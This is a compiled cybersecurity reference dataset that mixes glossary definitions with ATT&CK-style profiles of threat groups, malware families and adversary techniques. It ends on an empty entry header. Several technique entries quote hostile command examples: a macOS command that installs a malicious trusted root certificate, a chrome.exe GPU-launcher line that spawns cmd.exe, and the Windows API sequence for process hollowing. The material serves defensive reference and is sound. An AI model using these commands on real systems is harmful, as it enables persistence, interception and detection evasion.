Description: OilRig is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. The group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.

Name: Sagerunex
Type: malware
Description: Sagerunex is a malware family exclusively associated with Lotus Blossom operations, with variants existing since at least 2016. Variations of Sagerunex leverage non-traditional command and control mechanisms such as various web services.

Term: process
Definition: An executing program.

Term: subscriber
Definition: An entity that (1) is the subject named or identified in a certificate issued to such an entity, and (2) holds a private key that corresponds to a public key listed in that certificate.

Term: General Packet Radio Service (GPRS)
Definition: A packet switching enhancement to GSM and TDMA wireless networks to increase data transmission speeds.

Term: security functionality
Definition: The security-related features, functions, mechanisms, services, procedures, and architectures implemented within organizational information systems or the environments in which those systems operate.

Term: risk executive (function)
Definition: An individual or group within an organization that helps to ensure that: (i) security risk-related considerations for individual information systems, to include the authorization decisions for those systems, are viewed from an organization-wide perspective with regard to the overall strategic goals and objectives of the organization in carrying out its missions and business functions; and (ii) managing risk from individual information systems is consistent across the organization, reflects organizational risk tolerance, and is considered along with other organizational risks affecting mission/business success.

Term: ISO
Definition: Note: Organizations subordinate to federal agencies may use the term Senior Information Security Officer or Chief Information Security Officer to denote individuals filling positions with similar responsibilities to Senior Agency Information Security Officers.

Term: Web Service
Definition: A software component or system designed to support interoperable machine- or application- oriented interaction over a network. A Web service has an interface described in a machine-processable format (specifically WSDL). Other systems interact with the Web service in a manner prescribed by its description using SOAP messages, typically conveyed using HTTP with an XML serialization in conjunction with other Web-related standards.

Name: Direct Volume Access
Type: attack-pattern
Description: Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique may bypass Windows file access controls as well as file system monitoring tools.

Utilities, such as `NinjaCopy`, exist to perform these actions in PowerShell. Adversaries may also use built-in or third-party utilities (such as `vssadmin`, `wbadmin`, and esentutl) to create shadow copies or backups of data from system volumes.

Term: nonce
Definition: A time-varying value that has at most a negligible chance of repeating, for example, a random value that is generated anew for each use, a timestamp, a sequence number, or some combination of these.

Term: International Mobile Subscriber Identity (IMSI)
Definition: a unique number associated with every GSM mobile phone user.

Term: criticality level
Definition: Degree of impact that a requirement, module, error, fault, failure, or other item has on the development or operation of a system.

Term: senior information security officer (SISO)
Definition: Official responsible for carrying out the Chief Information Officer responsibilities under the Federal Information Security Management Act (FISMA) and serving as the Chief Information Officer’s primary liaison to the agency’s authorizing officials, information system owners, and information systems security officers. 
[Note 1: With respect to SecCM, a Senior Agency Information Security Officer is an individual that provides organization-wide procedures and/or templates for SecCM, manages or participates in the Configuration Control Board, and/or provides technical staff for security impact analyses.
Note 2: Organizations subordinate to federal agencies may use the term Senior Information Security Officer or Chief Information Security Officer to denote individuals filling positions with similar responsibilities to Senior Agency Information Security Officers.]

Term: public key certificate
Definition: A set of data that uniquely identifies a public key that has a corresponding private key and an owner that is authorized to use the key pair. The certificate contains the owner’s public key and possibly other information and is digitally signed by a certification authority (i.e., a trusted party), thereby binding the public key to the owner.

Term: Advanced Encryption Standard
Definition: Advanced Encryption Standard (as specified in FIPS 197).

Name: RobbinHood
Type: malware
Description: RobbinHood is ransomware that was first observed being used in an attack against the Baltimore city government's computer network.

Term: Trust Framework Providers
Definition: The entity responsible for the governance and administration of an identity federation.

Name: Boot or Logon Autostart Execution
Type: attack-pattern
Description: Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon. These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.

Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.

Term: Wallet
Definition: Software used to store and manage asymmetric-keys and addresses used for transactions.

Term: audit log
Definition: A chronological record of system activities. Includes records of system accesses and operations performed in a given period.

Term: identity
Definition: An attribute or set of attributes that uniquely describes a subject within a given context.

Term: KDK
Definition: A function that − with the input of a cryptographic key or shared secret and possibly other data − generates a binary string, called keying material.

Term: Normalization
Definition: See “Log Normalization”.

Name: BISCUIT
Type: malware
Description: BISCUIT is a backdoor that has been used by APT1 since as early as 2007.

Term: Randomized hashing
Definition: A process by which the input to a hash function is randomized before being processed by the hash function.

Term: asset identification
Definition: The use of attributes and methods to uniquely identify an asset.

Name: Scarlet Mimic
Type: intrusion-set
Description: Scarlet Mimic is a threat group that has targeted minority rights activists. This group has not been directly linked to a government source, but the group's motivations appear to overlap with those of the Chinese government. While there is some overlap between IP addresses used by Scarlet Mimic and Putter Panda, it has not been concluded that the groups are the same.

Term: <em>0xab</em>
Definition: Hexadecimal notation that is used to define a byte (i.e., eight bits) of information, where a and b each specify four bits of  information and have values from the range {0, 1, 2,…F}. For example, 0xc6 is used to represent 11000110, where c is 1100, and 6 is 0110.

Term: block size
Definition: The bit length of an input (or output) block of the block cipher.

Name: T9000
Type: malware
Description: T9000 is a backdoor that is a newer variant of the T5000 malware family, also known as Plat1. Its primary function is to gather information about the victim. It has been used in multiple targeted attacks against U.S.-based organizations.

Term: Candidate Checklist
Definition: Checklist that has been screened and approved by NIST for public review.

Term: <em>int(X)</em>
Definition: The integer for which the bit string X is a binary representation. len(X) The bit length of the bit string X.

Term: block cipher mode of operation
Definition: See “block cipher mode of operation.”

Term: Cyber Threat
Definition: The potential for a threat-source to exercise (accidentally trigger or intentionally exploit) a specific vulnerability.

Term: categorization
Definition: The process of determining the security category for information or an information system. Security categorization methodologies are described in CNSS Instruction 1253 for national security systems and in FIPS Publication 199 for other than national security systems. See Security Category.

Name: Squirrelwaffle
Type: malware
Description: Squirrelwaffle is a loader that was first seen in September 2021. It has been used in spam email campaigns to deliver additional malware such as Cobalt Strike and the QakBot banking trojan.

Term: cipher text auto-key
Definition: Cryptographic logic that uses previous cipher text to generate a key stream.

Name: LuminousMoth
Type: intrusion-set
Description: LuminousMoth is a Chinese-speaking cyber espionage group that has been active since at least October 2020. LuminousMoth has targeted high-profile organizations, including government entities, in Myanmar, the Philippines, Thailand, and other parts of Southeast Asia. Some security researchers have concluded there is a connection between LuminousMoth and Mustang Panda based on similar targeting and TTPs, as well as network infrastructure overlaps.

Term: Signature validation
Definition: The (mathematical) verification of the digital signature plus obtaining the appropriate assurances (e.g., public key validity, private key possession, etc.).

Term: authorize processing
Definition: The process of initially establishing access privileges of an individual and subse­quently verifying the acceptability of a request for access.

Term: plaintext
Definition: The input data to the authenticated encryption function that is both authenticated and encrypted.

Term: consent banner
Definition: The opening screen that informs users of the implications of accessing a computer resource (e.g. consent to monitor).

Term: Standalone Environment
Definition: Small office/home office environment.

Term: <em>{a1, ...ai}</em>
Definition: The internal state of the DRBG at a point in time. The types and number of the ai values depends on the specific DRBG mechanism.

Term: property inference
Definition: A data privacy attack that infers a global property about the training data of a machine learning model.

Term: syntonization
Definition: The process of setting two or more oscillators to the same frequency.

Name: Wiper
Type: malware
Description: Wiper is a family of destructive malware used in March 2013 during breaches of South Korean banks and media companies.

Term: Computer
Definition: A device that accepts digital data and manipulates the information based on a program or sequence of instructions for how data is to be processed.

Term: SF
Definition: A characteristic of an authentication system or an authenticator that requires only one authentication factor (something you know, something you have, or something you are) for successful authentication.

Name: Dynamic Data Exchange
Type: attack-pattern
Description: Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.

Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by Component Object Model, DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys.

Microsoft Office documents can be poisoned with DDE commands, directly or through embedded files, and used to deliver execution via Phishing campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. Similarly, adversaries may infect payloads to execute applications and/or commands on a victim device by way of embedding DDE formulas within a CSV file intended to be opened through a Windows spreadsheet program.

DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a Command and Scripting Interpreter. DDE execution can be invoked remotely via Remote Services such as Distributed Component Object Model (DCOM).

Term: data science
Definition: The field that combines domain expertise, programming skills, and knowledge of mathematics and statistics to extract meaningful insights from data.

Term: Problematic Data Action
Definition: A data action that causes an adverse effect, or problem, for individuals.

Term: Third-party Providers
Definition: Service providers, integrators, vendors, telecommunications, and infrastructure support that are external to the organization that operates the manufacturing system.

Term: access control
Definition: Restricts resource access to only authorized entities.

Name: Process Injection
Type: attack-pattern
Description: Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process. 

There are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific. 

More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel.

Term: local element
Definition: See hand receipt holder.

Name: VBShower
Type: malware
Description: VBShower is a backdoor that has been used by Inception since at least 2019. VBShower has been used as a downloader for second stage payloads, including PowerShower.

Term: adequate security
Definition: Meets minimum tolerable levels of security as determined by analysis, experience, or a combination of both and is as secure as reasonably practicable (i.e., incremental improvement in security would require an intolerable or disproportionate deterioration of meeting other system objectives, such as those for system performance, or would violate system constraints).

Name: ngrok
Type: tool
Description: ngrok is a legitimate reverse proxy tool that can create a secure tunnel to servers located behind firewalls or on local machines that do not have a public IP. ngrok has been leveraged by threat actors in several campaigns including use for lateral movement and data exfiltration.

Term: operational concept
Definition: Verbal and graphic statement, in broad outline, of an organization’s assumptions or intent in regard to an operation or series of operations of new, modified, or existing organizational systems.

Term: DEA
Definition: The DEA cryptographic engine that is used by the Triple Data Encryption Algorithm (TDEA).

Term: security incident
Definition: See incident.

Term: jitter
Definition: The time or phase difference between the data signal and the ideal clock.

Name: ANELLDR
Type: malware
Description: ANELLDR, a loader that has been in use since at least 2018, was designed to decrypt and execute UPPERCUT in memory. ANELLDR can use anti-analysis techniques and is known to share code overlap with HiddenFace.

Term: Reader Talks First
Definition: An RF transaction in which the reader transmits a signal that is received by tags in its vicinity. The tags may be commanded to respond to the reader and continue with further transactions.

Term: Semantic matching
Definition: uses contextual attributes of the digital object to interpret the artifact in a manner that more closely corresponds with human perceptual categories. For example, perceptual hashes allow the matching of visually similar images and are unconcerned with the low-level details of how the images are persistently stored. Semantic methods tend to provide the most specific results but also tend to be the most computationally expensive ones.

Term: black core
Definition: A communication network architecture in which user data traversing a global internet protocol (IP) network is end-to-end encrypted at the IP layer. Related to striped core.

Term: Permissions
Definition: Allowable user actions (e.g., read, write, execute).

Term: cryptographic key
Definition: A parameter used with a cryptographic algorithm that determines its operation in such a way that an entity with knowledge of the key can reproduce or reverse the operation, while an entity without knowledge of the key cannot. Examples applicable to this Recommendation include:
1. The computation of a keyed-hash message authentication code.
2. The verification of a keyed-hash message authentication code.
3. The generation of a digital signature on a message.
4. The verification of a digital signature.

Term: I
Definition: A 16-byte string used in LMS as a key pair identifier.

Name: SystemBC
Type: malware
Description: SystemBC is a malware family offered as a malware-as-a-service (MaaS) that is used to establish command and control and facilitate follow-on activity, including ransomware deployment.SystemBC executes a variety of tasks including setting up SOCKS5 proxies, maintaining persistence, ingesting malicious files, and handing C2 communication. SystemBC was first detected in 2018, and has been used by Wizard Spider since at least 2020, and by FIN7 since at least 2022.

Term: <em>S</em>
Definition: String of bytes.

Term: Period of protection
Definition: The period of time during which the integrity and/or confidentiality of a key needs to be maintained.

Term: Vendor
Definition: A commercial supplier of software or hardware.

Term: First responder
Definition: A person who provides a rapid initial response to any IT incident or event that may require further investigation. Examples of such events include security threats, cyber-attacks and other illegal activities.

Term: MFA
Definition: An authentication system that requires more than one distinct type of authentication factor for successful authentication. MFA can be performed using a multi-factor authenticator or by combining single-factor authenticators that provide different types of factors.

Name: Install Root Certificate
Type: attack-pattern
Description: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.

Installation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials.

Atypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide Adversary-in-the-Middle capability for intercepting information transmitted over secure TLS/SSL communications.

Root certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover artifacts of Persistence.

In macOS, the Ay MaMi malware uses <code>/usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert</code> to install a malicious certificate as a trusted root certificate into the system keychain.

Term: Threat Signaling
Definition: Real-time signaling of DDoS-related telemetry and threat-handling requests and data between elements concerned with DDoS attack detection, classification, traceback, and mitigation.

Name: Application Window Discovery
Type: attack-pattern
Description: Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used. For example, information about application windows could be used identify potential data to collect as well as identifying security tooling (Security Software Discovery) to evade.

Adversaries typically abuse system features for this type of enumeration. For example, they may gather information through native system features such as Command and Scripting Interpreter commands and Native API functions.

Term: classified national security information
Definition: Information that has been determined pursuant to Executive Order 13526 or any predecessor order to require protection against unauthorized disclosure and is marked to indicate its classified status when in documentary form.

Term: DET
Definition: Detection Error Tradeoff (characteristic) – A plot of FRR vs. FAR, or FNMR vs. FMR, used to inform security-convenience tradeoffs in (biometric) authentication processes

Term: VM
Definition: Software that allows a single host to run one or more guest operating systems.

Term: Byte
Definition: A bit string consisting of eight bits.

Term: mandate
Definition: A mandatory order or requirement under statute.

Term: Activities
Definition: An assessment object that includes specific protection-related pursuits or actions supporting a system that involves people (e.g., conducting system backup operations, monitoring network traffic).

Term: MAC
Definition: An access control policy that is uniformly enforced across all subjects and objects within the boundary of an information system. A subject that has been granted access to information is constrained from doing any of the following: (i) passing the information to unauthorized subjects or objects; (ii) granting its privileges to other subjects; (iii) changing one or more security attributes on subjects, objects, the information system, or system components; (iv) choosing the security attributes to be associated with newly-created or modified objects; or (v) changing the rules governing access control. Organization-defined subjects may explicitly be granted organization-defined privileges (i.e., they are trusted subjects) such that they are not limited by some or all of the above constraints.

Term: Scatternet
Definition: A chain of piconets created by allowing one or more Bluetooth devices to each be a slave in one piconet and act as the master for another piconet simultaneously. A scatternet allows several devices to be networked over an extended distance.

Term: Computing Device
Definition: A machine (real or virtual) for performing calculations automatically (including, but not limited to, computer, servers, routers, switches, etc.)

Term: Entropy
Definition: A measure of the disorder, randomness or variability in a closed system. See SP 800-90B.

Term: RS
Definition: Develop and implement the appropriate activities to take action regarding a detected cybersecurity event.

Term: Information System User
Definition: Person who interacts with the product.

Term: Bit Length
Definition: The number of bits in a bit string.

Name: SID-History Injection
Type: attack-pattern
Description: Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. An account can hold additional SIDs in the SID-History Active Directory attribute , allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).

With Domain Administrator (or equivalent) rights, harvested or well-known SID values may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as Remote Services, SMB/Windows Admin Shares, or Windows Remote Management.

Term: Role-based authentication
Definition: A process that provides assurance of an entity’s role by means of an authentication mechanism that verifies the role of the entity. Contrast with identity-based authentication

Term: Trusted Timestamp Authority (TTA)
Definition: An entity that is trusted to provide accurate time information.

Term: CPS
Definition: A statement of the practices that a Certification Authority employs in issuing and managing public key certificates.

Term: mean time to recovery
Definition: A metric that tracks the average amount of time that it takes to recover from a product or system failure.

Term: TA
Definition: A configured DNSKEY RR or DS RR hash of a DNSKEY RR. A validating DNSSEC-aware resolver uses this public key or hash as a starting point for building the authentication chain to a signed DNS response. In general, a validating resolver will need to obtain the initial values of its trust anchors via some secure or trusted means outside the DNS protocol. The presence of a trust anchor also implies that the resolver should expect the zone to which the trust anchor points to be signed. This is sometimes referred to as a “secure entry point.”

Term: security-relevant event
Definition: Any event that attempts to change the security state of the system (e.g., change access controls, change the security level of a user, change a user password).  Also, any event that attempts to violate the security policy of the system (e.g., too many logon attempts).

Term: <em>Lock Command</em>
Definition: A command that readers can send to a tag to block access to certain information on the tag.

Term: Website
Definition: A set of related web pages that are prepared and maintained as a collection in support of a single purpose.

Term: <em>H</em>
Definition: An auxiliary function used in certain key derivation methods. H is either an approved hash function, hash, or an HMAC-hash based on an approved hash function, hash, with a salt value used as the HMAC key.

Term: Second preimage
Definition: A message Ms’, that is different from a given message Ms , such that its message digest is the same as the known message digest of Ms.

Term: MD
Definition: A crytpographic checksum, typically generated for a file that can be used to detect changes to the file.. Synonyous with hash value/result.

Term: Security Parameters Index (SPI)
Definition: Arbitrarily chosen value that acts as a unique identifier for an IPsec connection.

Term: security control assessment
Definition: The testing or evaluation of security controls to determine the extent to which the controls are implemented correctly, operating as intended, and producing the desired outcome with respect to meeting the security requirements for a system or organization.

Term: addressable
Definition: Describing 21 of the HIPAA Security Rule’s 42 implementation specifications. To meet the addressable implementation specifications, a covered entity must (i) assess whether each implementation specification is a reasonable and appropriate safeguard in its environment, when analyzed with reference to the likely contribution to protecting the entity's electronic protected health information; and (ii) as applicable to the entity - (A) Implement the implementation specification if reasonable and appropriate; or (B) if implementing the implementation specification is not reasonable and appropriate—(1) document why it would not be reasonable and appropriate to implement the implementation specification; and (2) implement an equivalent alternative measure if reasonable and appropriate.

Term: Framework Implementation Tier
Definition: A lens through which to view the characteristics of an organization’s approach to risk—how an organization views cybersecurity risk and the processes in place to manage that risk.

Term: Concatenation
Definition: The concatenation of binary strings A and B.

Term: <em>Kill Command</em>
Definition: A command that readers can send to tags that uses electronic disabling mechanisms to prevent tags from responding to any additional commands.

Term: key
Definition: A parameter used in conjunction with a cryptographic algorithm that determines its operation in such a way that an entity with knowledge of the key can reproduce or reverse the operation while an entity without knowledge of the key cannot. Examples include 1. The transformation of plaintext data into ciphertext data, 2. The transformation of ciphertext data into plaintext data, 3. The computation of a digital signature from data, 4. The verification of a digital signature, 5. The computation of a message authentication code (MAC) from data, 6. The verification of a MAC received with data, 7. The computation of a shared secret that is used to derive keying material.

Term: information system security plan
Definition: A formal document that provides an overview of the security requirements for an information system or an information security program and describes the security controls in place or planned for meeting those requirements. The system security plan describes the system components that are included within the system, the environment in which the system operates, how the security requirements are implemented, and the relationships with or connections to other systems.

Term: Bind
Definition: To deterministically transform a logical construct into a machine-readable representation suitable for machine interchange and processing. The result of this transformation is called a binding. A binding may also be referred to as the “bound form” of its associated logical construct.

Term: chief information security officer
Definition: Official responsible for carrying out the Chief Information Officer responsibilities under FISMA and serving as the Chief Information Officer’s primary liaison to the agency’s authorizing officials, information system owners, and information system security officers.
Note: Organizations subordinate to federal agencies may use the term Senior Information Security Officer or Chief Information Security Officer to denote individuals filling positions with similar responsibilities to Senior Agency Information Security Officers.

Name: WEBC2
Type: malware
Description: WEBC2 is a family of backdoor malware used by APT1 as early as July 2006. WEBC2 backdoors are designed to retrieve a webpage, with commands hidden in HTML comments or special tags, from a predetermined C2 server.

Term: Temporal metrics
Definition: describe the characteristics of misuse vulnerabilities that can change over time but remain constant across user environments.

Term: key agreement
Definition: A (pair-wise) key-establishment procedure where the resultant secret keying material is a function of information contributed by two participants so that no party can predetermine the value of the secret keying material independently from the contributions of the other party. Contrast with key-transport.

Name: Electron Applications
Type: attack-pattern
Description: Adversaries may abuse components of the Electron framework to execute malicious code. The Electron framework hosts many common applications such as Signal, Slack, and Microsoft Teams. Originally developed by GitHub, Electron is a cross-platform desktop application development framework that employs web technologies like JavaScript, HTML, and CSS. The Chromium engine is used to display web content and Node.js runs the backend code.

Due to the functional mechanics of Electron (such as allowing apps to run arbitrary commands), adversaries may also be able to perform malicious functions in the background potentially disguised as legitimate tools within the framework. For example, the abuse of `teams.exe` and `chrome.exe` may allow adversaries to execute malicious commands as child processes of the legitimate application (e.g., `chrome.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c calc.exe`).

Adversaries may also execute malicious content by planting malicious JavaScript within Electron applications.

Term: Private key/private signature key
Definition: A cryptographic key that is used with an asymmetric (public key) cryptographic algorithm and is associated with a public key. The private key is uniquely associated with the owner and is not made public. This key is used to compute a digital signature that may be verified using the corresponding public key.

Term: Moderate Impact
Definition: The loss of confidentiality, integrity, or availability that could be expected to have a serious adverse effect on organizational operations, organizational assets, individuals, other organizations, or the national security interests of the United States; (i.e., 1) causes a significant degradation in mission capability to an extent and duration that the organization is able to perform its primary functions, but the effectiveness of the functions is significantly reduced; 2) results in significant damage to organizational assets; 3) results in significant financial loss; or 4) results in significant harm to individuals that does not involve loss of life or serious life threatening injuries.).

Term: hash digest
Definition: The result of applying a hash function to data.

Term: Machine Learning
Definition: The development and use of computer systems that adapt and learn from data with the goal of improving accuracy.

Term: Interactive User
Definition: A person who uses an SSH client to access one or more SSH servers, typically to perform administrative operations, transfer data, or access applications.

Term: nonce
Definition: A time-varying value that has at most a negligible chance of repeating; for example, a random value that is generated anew for each use, a time-stamp, a sequence number, or some combination of these. It can be a secret or non-secret value.

Name: Multi-Stage Channels
Type: attack-pattern
Description: Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.

Remote access tools will call back to the first-stage command and control server for instructions. The first stage may have automated capabilities to collect basic host information, update tools, and upload additional files. A second remote access tool (RAT) could be uploaded at that point to redirect the host to the second-stage command and control server. The second stage will likely be more fully featured and allow the adversary to interact with the system through a reverse shell and additional RAT features.

The different stages will likely be hosted separately with no overlapping infrastructure. The loader may also have backup first-stage callbacks or Fallback Channels in case the original first-stage communication path is discovered and blocked.

Name: Email Account
Type: attack-pattern
Description: Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).

In on-premises Exchange and Exchange Online, the <code>Get-GlobalAddressList</code> PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.

In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.

Name: Transport Agent
Type: attack-pattern
Description: Adversaries may abuse Microsoft transport agents to establish persistent access to systems. Microsoft Exchange transport agents can operate on email messages passing through the transport pipeline to perform various tasks such as filtering spam, filtering malicious attachments, journaling, or adding a corporate signature to the end of all outgoing emails. Transport agents can be written by application developers and then compiled to .NET assemblies that are subsequently registered with the Exchange server. Transport agents will be invoked during a specified stage of email processing and carry out developer defined tasks. 

Adversaries may register a malicious transport agent to provide a persistence mechanism in Exchange Server that can be triggered by adversary-specified email events. Though a malicious transport agent may be invoked for all emails passing through the Exchange transport pipeline, the agent can be configured to only carry out specific tasks in response to adversary defined criteria. For example, the transport agent may only carry out an action like copying in-transit attachments and saving them for later exfiltration if the recipient email address matches an entry on a list provided by the adversary.

Term: BOF
Definition: A condition at an interface under which more input can be placed into a buffer or data holding area than the intended capacity allocated (due to insecure or unbound allocation parameters), which overwrites other information. Attackers exploit such a condition to crash a system or to insert specially crafted code that allows them to gain control of the system.

Term: Tailored Security Control Baseline
Definition: A set of security controls resulting from the application of tailoring guidance to the security control baseline. See Tailoring.

Name: route
Type: tool
Description: route can be used to find or change information within the local system IP routing table.

Term: Security Control Item
Definition: See Security Control Item.

Term: Log Rotation
Definition: Closing a log file and opening a new log file when the first log file is considered to be complete.

Term: trust anchor
Definition: A public or symmetric key that is trusted because it is directly built into hardware or software, or securely provisioned via out-of-band means, rather than because it is vouched for by another trusted entity (e.g. in a public key certificate).

Term: Auditor
Definition: See Audit administrator.

Term: Incentive Mechanism
Definition: See Reward system

Name: SEASHARPEE
Type: malware
Description: SEASHARPEE is a Web shell that has been used by OilRig.

Term: destroy
Definition: A method of erasing electronically stored data, cryptographic keys, and credentials service providers (CSPs) by altering or deleting the contents of the data storage to prevent recovery of the data.

Term: Transport Layer Security (TLS)
Definition: An authentication and security protocol widely implemented in browsers and web servers. TLS is defined by RFC 5246 and RFC 8446.

Term: key transport
Definition: A key-establishment procedure whereby one party (the sender) selects and encrypts the keying material and then distributes the material to another party (the receiver). When used in conjunction with a public-key (asymmetric) algorithm, the keying material is encrypted using the public key of the receiver and subsequently decrypted using the private key of the receiver. When used in conjunction with a symmetric algorithm, the keying material is encrypted with a key-encrypting key shared by the two parties.

Term: nonlocal maintenance
Definition: Maintenance activities conducted by individuals communicating through an external network (e.g., the internet) or an internal network.

Term: digital twin
Definition: The virtual (i.e., digital) representation of a physical or perceived real-world entity, concept, or notion.

Term: MAC tag
Definition: Data obtained from the output of a MAC algorithm that can be used by an entity to verify the integrity and the origination of the information used as input to the MAC algorithm.

Term: DAC
Definition: An access control policy that is enforced over all subjects and objects in an information system where the policy specifies that a subject that has been granted access to information can do one or more of the following: (i) pass the information to other subjects or objects; (ii) grant its privileges to other subjects; (iii) change security attributes on subjects, objects, information systems, or system components; (iv) choose the security attributes to be associated with newly-created or revised objects; or (v) change the rules governing access control. Mandatory access controls restrict this capability.

Term: Sender
Definition: The party that sends secret keying material to the receiver using a key-transport transaction. Contrast with receiver.

Term: Media Access Control Address
Definition: A hardware address that uniquely identifies each component of an IEEE 802-based network. On networks that do not conform to the IEEE 802 standards but do conform to the OSI Reference Model, the node address is called the Data Link Control (DLC) address.

Term: Offline Test
Definition: Offline tests use previously captured images as inputs to core biometric implementations. Such tests are repeatable and can readily be scaled to very large populations and large numbers of competing products. They institute a level-playing field and produce robust estimates of the core biometric power of an algorithm.  This style of testing is particularly suited to interoperability testing of a fingerprint template (see [ISOSWAP]).

Term: anonymous identifier
Definition: identifier of a person which does not allow the unambiguous identification of the natural person

Name: Pay2Key
Type: malware
Description: Pay2Key is a ransomware written in C++ that has been used by Fox Kitten since at least July 2020 including campaigns against Israeli companies. Pay2Key has been incorporated with a leak site to display stolen sensitive information to further pressure victims into payment.

Term: TCFB-P
Definition: TEA Cipher Feedback Mode of Operation - Pipelined

Name: Password Guessing
Type: attack-pattern
Description: Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.

Guessing passwords can be a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. 

Typically, management services over commonly used ports are used when guessing passwords. Commonly targeted services include the following:

* SSH (22/TCP)
* Telnet (23/TCP)
* FTP (21/TCP)
* NetBIOS / SMB / Samba (139/TCP & 445/TCP)
* LDAP (389/TCP)
* Kerberos (88/TCP)
* RDP / Terminal Services (3389/TCP)
* HTTP/HTTP Management Services (80/TCP & 443/TCP)
* MSSQL (1433/TCP)
* Oracle (1521/TCP)
* MySQL (3306/TCP)
* VNC (5900/TCP)
* SNMP (161/UDP and 162/TCP/UDP)

In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.. Further, adversaries may abuse network device interfaces (such as `wlanAPI`) to brute force accessible wifi-router(s) via wireless authentication protocols.

In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows "logon failure" event ID 4625.

Term: <em>b</em>
Definition: The block size, in bits.

Name: Process Hollowing
Type: attack-pattern
Description: Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code in the address space of a separate live process. 

Process hollowing is commonly performed by creating a process in a suspended state then unmapping/hollowing its memory, which can then be replaced with malicious code. A victim process can be created with native Windows API calls such as <code>CreateProcess</code>, which includes a flag to suspend the processes primary thread. At this point the process can be unmapped using APIs calls such as <code>ZwUnmapViewOfSection</code> or <code>NtUnmapViewOfSection</code> before being written to, realigned to the injected code, and resumed via <code>VirtualAllocEx</code>, <code>WriteProcessMemory</code>, <code>SetThreadContext</code>, then <code>ResumeThread</code> respectively.

This is very similar to Thread Local Storage but creates a new process rather than targeting an existing process. This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process hollowing may also evade detection from security products since the execution is masked under a legitimate process.

Term: Cryptographic module
Definition: The set of hardware, software, and/or firmware that implements approved security functions and is contained within a cryptographic boundary.

Term: Log Retention
Definition: Archiving logs on a regular basis as part of standard operational activities.

Term: reporter
Definition: Any entity that reports a vulnerability to the Government and that may be an entity outside of the Government, within the Government, or within the specific system that has the vulnerability.

Term: Authenticated Encryption
Definition: The function of GCM in which the plaintext is encrypted into the ciphertext, and an authentication tag is generated on the AAD and the ciphertext.

Name: Service Execution
Type: attack-pattern
